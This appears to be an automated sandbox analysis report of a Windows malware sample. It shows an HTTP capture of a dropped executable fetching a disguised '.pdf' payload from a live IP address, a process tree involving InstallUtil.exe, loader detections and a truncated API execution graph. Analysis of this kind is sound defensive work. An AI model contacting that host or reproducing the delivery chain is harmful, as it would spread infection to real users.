                              Oct 30, 2024 20:19:06.067398071 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:06.067450047 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:07.281696081 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:07.281797886 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:43.854196072 CET4970980192.168.2.646.8.237.66
                              • 46.8.237.66
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.64970946.8.237.66806752C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              TimestampBytes transferredDirectionData
                              Oct 30, 2024 20:19:00.759234905 CET80OUTGET /spool01/Rhxkjsv.pdf HTTP/1.1
                              Host: 46.8.237.66
                              Connection: Keep-Alive
                              Oct 30, 2024 20:19:01.629309893 CET1236INHTTP/1.1 200 OK
                              Date: Wed, 30 Oct 2024 19:19:01 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Last-Modified: Fri, 25 Oct 2024 15:28:31 GMT
                              ETag: "14dc08-6254ec57945c0"
                              Accept-Ranges: bytes
                              Content-Length: 1367048
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/pdf
                              Data Raw: a7 0a 18 02 b5 c3 96 d3 38 cf a1 58 89 4c 2b 78 3a a9 71 82 bc 15 61 17 45 18 df 31 b7 25 78 0c bf d9 cf 89 24 8f 86 02 ad fb 88 be 64 d0 0e a4 a4 8c ba 76 b4 de 75 91 eb 1a 7e 4b dc f1 46 70 0b b6 ba 7d f7 3f a8 a0 49 fc 49 e8 1a 7a 12 af 34 66 75 a6 62 be e2 00 d1 ff e6 db 15 7e b8 8f b9 09 ae 03 15 65 8f d2 0a a4 89 21 54 86 76 dd a1 f8 a1 16 63 cb 74 e9 4d 45 f4 b7 d9 e9 4a de 15 e3 b7 59 f4 9f 2c 1b 41 13 4e 6b d3 93 a2 32 f4 74 5a a8 ea 56 61 89 a4 a6 24 08 97 b5 a5 6c 68 30 cf 89 15 c2 86 7c f8 3e 24 eb 0d e6 ca 5e 06 26 09 6b 8b 73 08 94 4e 5b 03 9f 6c a3 24 1c 6b d2 d1 7c 49 28 98 23 43 2e 56 df 0b b8 6e d6 28 9d 18 15 f5 4b b0 c3 71 1f 29 d6 3c 6a 78 50 05 1a 93 20 67 f6 28 ff f4 d8 90 dc 34 e4 6a 33 94 83 5e 01 bc 61 74 ba b3 b3 2c 21 36 70 a4 84 23 c7 6c d9 ae be ec 0e 55 f6 f0 ea 3f 15 56 16 9b d1 3e b3 a4 e3 e4 7d f4 d5 57 7b 69 d7 2f df b3 8e 60 e9 09 0c 52 ea 44 2e f4 43 d4 fe ff ce d5 a8 0d 13 75 7f 33 47 47 e7 29 f9 a6 d5 23 ba b4 34 6b 16 ac 0a 93 f9 1d fc 23 09 f2 bf 5b 19 2a db [TRUNCATED]
                              Data Ascii: 8XL+x:qaE1%x$dvu~KFp}?IIz4fub~e!TvctMEJY,ANk2tZVa$lh0|>$^&ksN[l$k|I(#C.Vn(Kq)<jxP g(4j3^at,!6p#lU?V>}W{i/`RD.Cu3GG)#4k#[*#CSxYpy5;= g]DB}e<9z]a5r03*Ybe2T89B\B<l%h^X<]"cy$Oqp )PY%39kW7qnj?h<ilVxx/gJv,T?r+S>?^E)J:=G7w_f83hz%*9)rAT5c`/C5Sa'D_G/&9=v4>HAZ,khRC8ujF<E;D,8:V,)-1}`ie<H9 T|F&CF&D)|D.Dt <U||K.l$!3jH|0Q_7|uAFDl.5*Bjab&DeK445D%U?u3qR'*
                              Oct 30, 2024 20:19:01.629386902 CET1236INData Raw: 1c 7a f8 07 17 db 2d 58 c7 ff e8 82 f1 32 78 8e 95 e5 03 17 3e 85 ab c8 84 9d 9a a3 62 b9 8c bb 89 7c ba d0 26 54 50 70 bd 47 73 36 c9 98 d6 a5 e1 49 96 34 6f fc 44 50 14 b4 b8 35 75 c7 b3 a8 5b f9 c7 ec fb 0b 1f 17 b6 4f 4a d6 1c 30 ba 0f dd fe
                              Data Ascii: z-X2x>b|&TPpGs6I4oDP5u[OJ0c^x)P1:hW[qZwQkztc_a~F6{*RqwrU!-q'8L`zTZ7S"IO]/|aH"[XQ9RiS&&16HA[ff>
                              Oct 30, 2024 20:19:01.629398108 CET424INData Raw: 80 9f 74 5c c6 a0 2c 1f 8a fc ca f9 4b 71 2a 8e d1 9b cd 55 c8 94 4e 08 07 7a b8 a0 5e 26 d9 6d 41 b4 5d 86 03 2e e2 ea 82 f2 8d 3e 1c 18 8f c3 04 c3 42 f1 d9 83 67 42 43 b6 a1 6c 22 95 49 2e 5e ce 22 57 07 97 2e c0 05 38 aa a9 d6 1f 80 00 44 32
                              Data Ascii: t\,Kq*UNz^&mA].>BgBCl"I.^"W.8D2(9!X(XYS|5mWFdvGL*1A;')XL3i0i+yu4- _*b1V<sCKLS\Dd(x`
                              Oct 30, 2024 20:19:01.629507065 CET1236INData Raw: c7 64 68 3d 2d de 5e 50 e3 d4 58 0e 8d 2c 0c 78 d9 25 46 38 85 67 ae 3d d2 26 ea 4c 56 e8 b4 c5 bf 1a 90 55 ed d7 de c2 76 39 24 b0 8d f2 10 58 1f 5e 0f a6 70 34 11 e4 75 12 61 45 33 70 4a 30 4f ce 77 7e a7 3f 0f ea 10 e5 72 24 21 92 c8 4d dd cb
                              Data Ascii: dh=-^PX,x%F8g=&LVUv9$X^p4uaE3pJ0Ow~?r$!MWwk-,V>'YWe1o#$sY@oGDeR!jIQsWGbFsO:Jk|{]zfI24y&V nVay4R/k-/ ^%j#`
                              Oct 30, 2024 20:19:01.629518986 CET1236INData Raw: 6f 92 5d a0 6a 8c a4 cd c8 a2 c9 f2 36 07 67 02 0a 43 bc e7 8d ec c8 dc 64 dd 18 e4 62 95 f0 70 cf d0 73 c6 d0 80 45 b0 65 bc 03 f7 c8 3d 12 97 13 ca ba 92 a9 d0 4b 10 3f b0 f1 b0 7c b6 57 47 73 d7 4d 50 7c b4 13 0d 5e 36 87 11 b9 8d cd 9f 42 d3
                              Data Ascii: o]j6gCdbpsEe=K?|WGsMP|^6Bq!8"0C/4MAH2O0xeeJO8;1us:3Gvs( MLE@*rjd`2'Uujb9V)IT2;IjQ}'@:6
                              Oct 30, 2024 20:19:01.629528999 CET424INData Raw: 25 ea 55 49 7d 29 4e 43 76 fe cb 93 7b 77 2c 29 81 64 cd 1d da 0a 7b fc b5 82 29 31 3c 8c 2a 19 11 01 20 25 cb 4e 69 7e 1f ae 7c ee f5 14 35 06 5a e2 7b c7 5e 9e c0 c5 4f 3e 1d 06 b3 6b 00 a6 1c 30 e7 5f f9 fe a7 42 c2 ca 0f 92 bd 0e 36 32 4d 39
                              Data Ascii: %UI})NCv{w,)d{)1<* %Ni~|5Z{^O>k0_B62M9f.3{U4p` 1%0xz >d'2IpCK2mDvr))=pAGXJJ5uzE3i?9Hh:JDRXDzF
                              Oct 30, 2024 20:19:01.629539967 CET1236INData Raw: d9 a5 c5 51 3a 3e a3 ec 6c 15 87 4f 18 af eb 50 9a 85 32 27 f7 34 23 19 17 e9 64 33 4d 05 06 b4 c9 af b5 30 b2 89 4d 2a 2d 61 a5 2b d3 0e 47 6e 1c bf 8c 5d f0 17 14 ac 8d 38 f1 f1 6d 15 7b 7a 11 68 6f e8 cb d7 5b 72 86 56 36 1f 10 7c 96 22 29 03
                              Data Ascii: Q:>lOP2'4#d3M0M*-a+Gn]8m{zho[rV6|")WZ?U~9+qwSkUnmOf+yN+hGwc>;r=^]::TGP\,M^`?E4=$~x
                              Oct 30, 2024 20:19:01.630059958 CET1236INData Raw: e4 53 24 61 6f ca 8b a7 f8 25 03 d8 c5 24 4a ed 22 10 1d 6d eb fb bc 6a 58 37 05 43 46 1c df cd 39 6d 04 f5 d4 5e 52 29 66 f4 1f 13 1d e5 a8 30 39 b9 2d f0 e1 6a 83 0f c1 8c 82 f1 f1 f6 fd 7a 1a 7c 19 cf 73 92 a6 c2 56 a3 46 0f ce 1b e3 d2 de b5
                              Data Ascii: S$ao%$J"mjX7CF9m^R)f09-jz|sVFz^pXV^T-m&kE-V`]H\592jH5Sm`d1njzYGqqF2_g@Wuhq/H#v\.v
                              Oct 30, 2024 20:19:01.630074978 CET424INData Raw: 4c b7 64 5d 45 0a 2a b0 24 d6 97 1e ce 7f f3 64 4d bf 65 78 c5 f4 bd b3 df 63 60 07 b5 95 ce f3 fd 65 3a e4 1d 27 7b 23 cd 70 43 18 92 f8 9d 5b c0 cb 64 5b 72 5e 0a c5 44 2e 39 bb f5 85 80 42 9d 36 3f 65 46 d6 7d 20 18 04 40 28 52 c7 18 f5 b2 bd
                              Data Ascii: Ld]E*$dMexc`e:'{#pC[d[r^D.9B6?eF} @(Rd,HZA?2_L7"LasS 2M@ta,p0jt*cv5%sT?qqX3<B*KA<?b[%XZJUjwd;\
                              Oct 30, 2024 20:19:01.630085945 CET1236INData Raw: 8c bb 56 8b 20 3d a1 2a 02 0a d9 06 24 d3 dd df 8a 5b e1 d3 79 59 af 78 98 7d 68 55 10 1e 60 de db ac f7 14 31 3c 60 73 77 28 09 09 2f 82 77 4a 31 ac ae ba fc 3c be eb cd b9 c4 be 74 1a a2 35 00 a5 ee 56 ea 7c 1f b5 ec 1d a4 64 83 0d 68 fd db 0b
                              Data Ascii: V =*$[yYx}hU`1<`sw(/wJ1<t5V|dhx=)qf0$5yhXh:_Nx8?Bj7#`F.PO ,4 Eqr)[ZS=r3btK+^Y9b/b/]82N7Sfp&%4g!=eq;oeunY
                              Oct 30, 2024 20:19:01.634896994 CET1236INData Raw: 10 50 5c 25 84 f3 05 e8 23 5d 92 a7 1c f5 31 49 f0 2a 0b df d1 31 3e 83 46 1b 83 34 90 73 d1 23 4c 33 c6 1f 8b 49 b1 48 a8 53 18 e4 8f 4f 07 de 51 78 6b 84 d9 7b ce 30 87 be a0 d4 a8 d9 ba bc 8b 29 74 6d 25 2b 79 04 f1 92 ea 4b b5 58 16 30 37 af
                              Data Ascii: P\%#]1I*1>F4s#L3IHSOQxk{0)tm%+yKX07:]gB}2z*bWZRDRWf!0%-! D7-\Oc5]Ky^uRlEVN!'2YW0 m;B4Q3IT9;|OB


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:15:18:59
                              Start date:30/10/2024
                              Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe"
                              Imagebase:0x7ff71d1d0000
                              File size:194'048 bytes
                              MD5 hash:485927FE0C19012F31F1EF565254B374
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:15:18:59
                              Start date:30/10/2024
                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              Imagebase:0xfb0000
                              File size:57'568 bytes
                              MD5 hash:D9021E407CD5133BA842A9F6F21B606B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2539050952.0000000006FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 29%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:15:19:09
                              Start date:30/10/2024
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                              Imagebase:0x7ff713720000
                              File size:71'680 bytes
                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:15:19:41
                              Start date:30/10/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0x5d0000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:9
                              Start time:15:19:42
                              Start date:30/10/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172
                              Imagebase:0xe10000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:28%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:42.1%
                                Total number of Nodes:927
                                Total number of Limit Nodes:45
                                execution_graph 2066 7ff71d1d8200 2085 7ff71d1d8964 2066->2085 2070 7ff71d1d824b 2071 7ff71d1d825d 2070->2071 2072 7ff71d1d8277 Sleep 2070->2072 2073 7ff71d1d826d _amsg_exit 2071->2073 2079 7ff71d1d8284 2071->2079 2072->2070 2073->2079 2074 7ff71d1d82fc _initterm 2076 7ff71d1d8319 _IsNonwritableInCurrentImage 2074->2076 2075 7ff71d1d82dd 2076->2075 2077 7ff71d1d837d 2076->2077 2078 7ff71d1d83f8 _ismbblead 2076->2078 2089 7ff71d1d2c54 GetVersion 2077->2089 2078->2076 2079->2074 2079->2075 2079->2076 2082 7ff71d1d83cf 2082->2075 2084 7ff71d1d83d8 _cexit 2082->2084 2083 7ff71d1d83c7 exit 2083->2082 2084->2075 2086 7ff71d1d8209 GetStartupInfoW 2085->2086 2087 7ff71d1d8990 6 API calls 2085->2087 2086->2070 2088 7ff71d1d8a0f 2087->2088 2088->2086 2090 7ff71d1d2cc3 2089->2090 2091 7ff71d1d2c7b 2089->2091 2113 7ff71d1d2db4 2090->2113 2091->2090 2093 7ff71d1d2c7f GetModuleHandleW 2091->2093 2093->2090 2095 7ff71d1d2c97 GetProcAddress 2093->2095 2095->2090 2097 7ff71d1d2cb2 2095->2097 2096 7ff71d1d2d7f 2099 7ff71d1d2d8b CloseHandle 2096->2099 2100 7ff71d1d2d97 2096->2100 2097->2090 2099->2100 2100->2082 2100->2083 2104 7ff71d1d2d29 2104->2096 2105 7ff71d1d2d33 2104->2105 2106 7ff71d1d2d5e 2104->2106 2230 7ff71d1d4dcc 2105->2230 2108 7ff71d1d2d67 ExitWindowsEx 2106->2108 2109 7ff71d1d2d7a 2106->2109 2108->2096 2259 7ff71d1d1c0c GetCurrentProcess OpenProcessToken 2109->2259 2114 7ff71d1d8b09 2113->2114 2115 7ff71d1d2df9 memset memset 2114->2115 2267 7ff71d1d5050 FindResourceA SizeofResource 2115->2267 2118 7ff71d1d2e53 CreateEventA SetEvent 2119 7ff71d1d5050 7 API calls 2118->2119 2120 7ff71d1d2e92 2119->2120 2122 7ff71d1d2ed5 2120->2122 2125 7ff71d1d2fa3 2120->2125 2131 7ff71d1d2e96 2120->2131 2121 7ff71d1d4dcc 24 API calls 2149 7ff71d1d2fd9 2121->2149 2126 7ff71d1d5050 7 API calls 2122->2126 2123 7ff71d1d4dcc 24 API calls 2158 7ff71d1d2eb4 2123->2158 2272 7ff71d1d70a8 2125->2272 2129 7ff71d1d2eec 2126->2129 2129->2131 2132 7ff71d1d2efe CreateMutexA 2129->2132 2131->2123 2132->2125 2135 7ff71d1d2f22 GetLastError 2132->2135 2133 7ff71d1d2fc4 2136 7ff71d1d2fcd 2133->2136 2137 7ff71d1d2fde FindResourceExA 2133->2137 2134 7ff71d1d2fb5 2134->2121 2135->2125 2138 7ff71d1d2f35 2135->2138 2307 7ff71d1d204c 2136->2307 2140 7ff71d1d3014 2137->2140 2141 7ff71d1d2fff LoadResource 2137->2141 2142 7ff71d1d2f62 2138->2142 2143 7ff71d1d2f4a 2138->2143 2145 7ff71d1d301d #17 2140->2145 2146 7ff71d1d3029 2140->2146 2141->2140 2147 7ff71d1d4dcc 24 API calls 2142->2147 2144 7ff71d1d4dcc 24 API calls 2143->2144 2148 7ff71d1d2f60 2144->2148 2145->2146 2146->2149 2150 7ff71d1d303a 2146->2150 2151 7ff71d1d2f7c 2147->2151 2152 7ff71d1d2f81 CloseHandle 2148->2152 2299 7ff71d1d8470 2149->2299 2322 7ff71d1d3bf4 GetVersionExA 2150->2322 2151->2125 2151->2152 2152->2149 2158->2149 2159 7ff71d1d30ec 2160 7ff71d1d3116 2159->2160 2161 7ff71d1d3141 2159->2161 2162 7ff71d1d3134 2160->2162 2436 7ff71d1d60a4 2160->2436 2456 7ff71d1d5fe4 2161->2456 2614 7ff71d1d3f74 2162->2614 2171 7ff71d1d8470 7 API calls 2173 7ff71d1d2ce1 2171->2173 2172 7ff71d1d315b GetSystemDirectoryA 2174 7ff71d1d7ba8 CharPrevA 2172->2174 2205 7ff71d1d61ec 2173->2205 2175 7ff71d1d3186 LoadLibraryA 2174->2175 2176 7ff71d1d319f GetProcAddress 2175->2176 2177 7ff71d1d31c9 FreeLibrary 2175->2177 2176->2177 2178 7ff71d1d31ba DecryptFileA 2176->2178 2179 7ff71d1d3273 SetCurrentDirectoryA 2177->2179 2180 7ff71d1d31e4 2177->2180 2178->2177 2181 7ff71d1d3291 2179->2181 2182 7ff71d1d320d 2179->2182 2180->2179 2183 7ff71d1d31f0 GetWindowsDirectoryA 2180->2183 2186 7ff71d1d331f 2181->2186 2192 7ff71d1d32fb 2181->2192 2195 7ff71d1d32cb 2181->2195 2187 7ff71d1d4dcc 24 API calls 2182->2187 2183->2182 2184 7ff71d1d325a 2183->2184 2519 7ff71d1d6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2184->2519 2190 7ff71d1d3347 2186->2190 2191 7ff71d1d2318 18 API calls 2186->2191 2203 7ff71d1d3236 2186->2203 2189 7ff71d1d322b 2187->2189 2633 7ff71d1d7700 GetLastError 2189->2633 2194 7ff71d1d3368 2190->2194 2568 7ff71d1d40c4 2190->2568 2191->2190 2546 7ff71d1d5d90 2192->2546 2198 7ff71d1d3383 2194->2198 2194->2203 2199 7ff71d1d7ac8 28 API calls 2195->2199 2196 7ff71d1d3230 2196->2203 2644 7ff71d1d494c 2198->2644 2200 7ff71d1d32f6 2199->2200 2200->2203 2634 7ff71d1d772c 2200->2634 2203->2171 2206 7ff71d1d6214 2205->2206 2207 7ff71d1d624c LocalFree LocalFree 2206->2207 2209 7ff71d1d6229 SetFileAttributesA DeleteFileA 2206->2209 2214 7ff71d1d6273 2206->2214 2207->2206 2208 7ff71d1d6311 2210 7ff71d1d6387 2208->2210 2212 7ff71d1d632d RegOpenKeyExA 2208->2212 2209->2207 2211 7ff71d1d8470 7 API calls 2210->2211 2213 7ff71d1d2ce8 2211->2213 2212->2210 2215 7ff71d1d635e RegDeleteValueA RegCloseKey 2212->2215 2213->2096 2213->2104 2219 7ff71d1d2318 2213->2219 2214->2208 2216 7ff71d1d62f4 SetCurrentDirectoryA 2214->2216 2217 7ff71d1d7c40 4 API calls 2214->2217 2215->2210 2218 7ff71d1d204c 16 API calls 2216->2218 2217->2216 2218->2208 2220 7ff71d1d2330 2219->2220 2221 7ff71d1d2447 2219->2221 2223 7ff71d1d23cb RegOpenKeyExA 2220->2223 2224 7ff71d1d233a 2220->2224 2893 7ff71d1d2244 GetWindowsDirectoryA 2221->2893 2225 7ff71d1d23c3 2223->2225 2226 7ff71d1d23fe RegQueryInfoKeyA 2223->2226 2224->2225 2228 7ff71d1d234a RegOpenKeyExA 2224->2228 2225->2104 2227 7ff71d1d23a8 RegCloseKey 2226->2227 2227->2225 2228->2225 2229 7ff71d1d237d RegQueryValueExA 2228->2229 2229->2227 2231 7ff71d1d4e49 LoadStringA 2230->2231 2245 7ff71d1d5024 2230->2245 2233 7ff71d1d4e73 2231->2233 2234 7ff71d1d4eb5 2231->2234 2232 7ff71d1d8470 7 API calls 2235 7ff71d1d2d59 2232->2235 2237 7ff71d1d7f04 13 API calls 2233->2237 2236 7ff71d1d4f31 2234->2236 2244 7ff71d1d4ec1 LocalAlloc 2234->2244 2235->2096 2235->2106 2241 7ff71d1d4f44 LocalAlloc 2236->2241 2242 7ff71d1d4f8e LocalAlloc 2236->2242 2238 7ff71d1d4e78 2237->2238 2239 7ff71d1d4e81 MessageBoxA 2238->2239 2240 7ff71d1d7e34 2 API calls 2238->2240 2239->2245 2240->2239 2241->2245 2248 7ff71d1d4f79 2241->2248 2242->2245 2254 7ff71d1d4f2c 2242->2254 2244->2245 2250 7ff71d1d4f14 2244->2250 2245->2232 2251 7ff71d1d114c _vsnprintf 2248->2251 2249 7ff71d1d4fbc MessageBeep 2252 7ff71d1d7f04 13 API calls 2249->2252 2253 7ff71d1d114c _vsnprintf 2250->2253 2251->2254 2255 7ff71d1d4fd3 2252->2255 2253->2254 2254->2249 2256 7ff71d1d4fdc MessageBoxA LocalFree 2255->2256 2257 7ff71d1d7e34 2 API calls 2255->2257 2256->2245 2257->2256 2260 7ff71d1d1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2263 7ff71d1d1c4c 2259->2263 2261 7ff71d1d1cec ExitWindowsEx 2260->2261 2260->2263 2261->2263 2264 7ff71d1d1c68 2261->2264 2262 7ff71d1d4dcc 24 API calls 2262->2264 2263->2262 2265 7ff71d1d8470 7 API calls 2264->2265 2266 7ff71d1d1d1a 2265->2266 2266->2096 2268 7ff71d1d509b 2267->2268 2270 7ff71d1d2e43 2267->2270 2269 7ff71d1d50a4 FindResourceA LoadResource LockResource 2268->2269 2268->2270 2269->2270 2271 7ff71d1d50e3 memcpy_s FreeResource 2269->2271 2270->2118 2270->2134 2271->2270 2281 7ff71d1d7566 2272->2281 2297 7ff71d1d70f2 2272->2297 2273 7ff71d1d8470 7 API calls 2274 7ff71d1d2fb1 2273->2274 2274->2133 2274->2134 2275 7ff71d1d711d CharNextA 2275->2297 2276 7ff71d1d71e7 GetModuleFileNameA 2277 7ff71d1d720f 2276->2277 2278 7ff71d1d721c 2276->2278 2364 7ff71d1d7d68 2277->2364 2278->2281 2280 7ff71d1d76f1 2373 7ff71d1d8648 RtlCaptureContext RtlLookupFunctionEntry 2280->2373 2281->2273 2283 7ff71d1d71ca 2283->2276 2283->2281 2285 7ff71d1d7238 CharUpperA 2286 7ff71d1d766f 2285->2286 2285->2297 2287 7ff71d1d4dcc 24 API calls 2286->2287 2288 7ff71d1d7692 2287->2288 2289 7ff71d1d769e CloseHandle 2288->2289 2290 7ff71d1d76aa ExitProcess 2288->2290 2289->2290 2291 7ff71d1d739d CharUpperA 2291->2297 2292 7ff71d1d7ce8 IsDBCSLeadByte CharNextA 2292->2297 2293 7ff71d1d7346 CompareStringA 2293->2297 2294 7ff71d1d73fb CharUpperA 2294->2297 2295 7ff71d1d72d0 CharUpperA 2295->2297 2296 7ff71d1d7492 CharUpperA 2296->2297 2297->2275 2297->2280 2297->2281 2297->2283 2297->2285 2297->2291 2297->2292 2297->2293 2297->2294 2297->2295 2297->2296 2369 7ff71d1d7ba8 2297->2369 2300 7ff71d1d8479 2299->2300 2301 7ff71d1d2cd4 2300->2301 2302 7ff71d1d84d0 RtlCaptureContext RtlLookupFunctionEntry 2300->2302 2301->2096 2301->2159 2303 7ff71d1d8515 RtlVirtualUnwind 2302->2303 2304 7ff71d1d8557 2302->2304 2303->2304 2379 7ff71d1d8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2304->2379 2308 7ff71d1d2213 2307->2308 2311 7ff71d1d2086 2307->2311 2309 7ff71d1d8470 7 API calls 2308->2309 2310 7ff71d1d2222 2309->2310 2310->2149 2312 7ff71d1d20dc FindFirstFileA 2311->2312 2312->2308 2313 7ff71d1d20fe 2312->2313 2314 7ff71d1d21a3 2313->2314 2315 7ff71d1d2138 lstrcmpA 2313->2315 2317 7ff71d1d21d9 FindNextFileA 2313->2317 2320 7ff71d1d7ba8 CharPrevA 2313->2320 2321 7ff71d1d204c 8 API calls 2313->2321 2318 7ff71d1d21b4 SetFileAttributesA DeleteFileA 2314->2318 2316 7ff71d1d2158 lstrcmpA 2315->2316 2315->2317 2316->2313 2316->2317 2317->2313 2319 7ff71d1d21f5 FindClose RemoveDirectoryA 2317->2319 2318->2317 2319->2308 2320->2313 2321->2313 2327 7ff71d1d3c59 2322->2327 2330 7ff71d1d3c4f 2322->2330 2323 7ff71d1d4dcc 24 API calls 2324 7ff71d1d3f05 2323->2324 2325 7ff71d1d8470 7 API calls 2324->2325 2326 7ff71d1d3042 2325->2326 2326->2149 2337 7ff71d1d12ec 2326->2337 2327->2324 2329 7ff71d1d3db1 2327->2329 2327->2330 2380 7ff71d1d2834 2327->2380 2329->2324 2329->2330 2331 7ff71d1d3eb7 MessageBeep 2329->2331 2330->2323 2330->2324 2393 7ff71d1d7f04 2331->2393 2334 7ff71d1d3ed3 MessageBoxA 2334->2324 2338 7ff71d1d133c 2337->2338 2339 7ff71d1d14b5 2337->2339 2427 7ff71d1d11cc LoadLibraryA 2338->2427 2341 7ff71d1d8470 7 API calls 2339->2341 2343 7ff71d1d14da 2341->2343 2343->2149 2356 7ff71d1d7ac8 FindResourceA 2343->2356 2344 7ff71d1d134d GetCurrentProcess OpenProcessToken 2344->2339 2345 7ff71d1d1377 GetTokenInformation 2344->2345 2346 7ff71d1d14a0 CloseHandle 2345->2346 2347 7ff71d1d13a0 GetLastError 2345->2347 2346->2339 2347->2346 2348 7ff71d1d13b5 LocalAlloc 2347->2348 2348->2346 2349 7ff71d1d13d2 GetTokenInformation 2348->2349 2350 7ff71d1d1491 LocalFree 2349->2350 2351 7ff71d1d13fc AllocateAndInitializeSid 2349->2351 2350->2346 2351->2350 2354 7ff71d1d1445 2351->2354 2352 7ff71d1d1481 FreeSid 2352->2350 2353 7ff71d1d1452 EqualSid 2353->2354 2355 7ff71d1d1476 2353->2355 2354->2352 2354->2353 2354->2355 2355->2352 2357 7ff71d1d7b63 2356->2357 2358 7ff71d1d7b03 LoadResource 2356->2358 2360 7ff71d1d4dcc 24 API calls 2357->2360 2358->2357 2359 7ff71d1d7b1d DialogBoxIndirectParamA FreeResource 2358->2359 2359->2357 2362 7ff71d1d7b87 2359->2362 2361 7ff71d1d7b82 2360->2361 2361->2362 2362->2158 2365 7ff71d1d7dd9 2364->2365 2367 7ff71d1d7d88 2364->2367 2365->2278 2366 7ff71d1d7d90 IsDBCSLeadByte 2366->2367 2367->2366 2368 7ff71d1d7db6 CharNextA 2367->2368 2368->2365 2368->2367 2370 7ff71d1d7bc8 2369->2370 2370->2370 2371 7ff71d1d7bda 2370->2371 2372 7ff71d1d7bec CharPrevA 2370->2372 2371->2297 2372->2371 2374 7ff71d1d8685 RtlVirtualUnwind 2373->2374 2375 7ff71d1d86c7 2373->2375 2374->2375 2378 7ff71d1d8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff71d1d2a2f 2380->2381 2390 7ff71d1d2872 2380->2390 2383 7ff71d1d2a50 2381->2383 2384 7ff71d1d2a41 GlobalFree 2381->2384 2383->2329 2384->2383 2385 7ff71d1d28a5 GetFileVersionInfoSizeA 2386 7ff71d1d28c2 GlobalAlloc 2385->2386 2385->2390 2386->2381 2387 7ff71d1d28e1 GlobalLock 2386->2387 2387->2381 2388 7ff71d1d28fc GetFileVersionInfoA 2387->2388 2389 7ff71d1d2920 VerQueryValueA 2388->2389 2388->2390 2389->2390 2391 7ff71d1d29ed GlobalUnlock 2389->2391 2390->2381 2390->2385 2390->2391 2392 7ff71d1d29d9 GlobalUnlock 2390->2392 2408 7ff71d1d261c 2390->2408 2391->2390 2392->2381 2394 7ff71d1d7f44 GetVersionExA 2393->2394 2402 7ff71d1d8076 2393->2402 2395 7ff71d1d7f6d 2394->2395 2394->2402 2398 7ff71d1d7f90 GetSystemMetrics 2395->2398 2395->2402 2396 7ff71d1d8470 7 API calls 2397 7ff71d1d3eca 2396->2397 2397->2334 2404 7ff71d1d7e34 2397->2404 2399 7ff71d1d7fa7 RegOpenKeyExA 2398->2399 2398->2402 2400 7ff71d1d7fdc RegQueryValueExA RegCloseKey 2399->2400 2399->2402 2400->2402 2403 7ff71d1d8026 2400->2403 2401 7ff71d1d8065 CharNextA 2401->2403 2402->2396 2403->2401 2403->2402 2405 7ff71d1d7edd 2404->2405 2406 7ff71d1d7e5a EnumResourceLanguagesA 2404->2406 2405->2334 2406->2405 2407 7ff71d1d7e9f EnumResourceLanguagesA 2406->2407 2407->2405 2409 7ff71d1d27e0 GetSystemDirectoryA 2408->2409 2410 7ff71d1d265b CharUpperA CharNextA CharNextA 2408->2410 2413 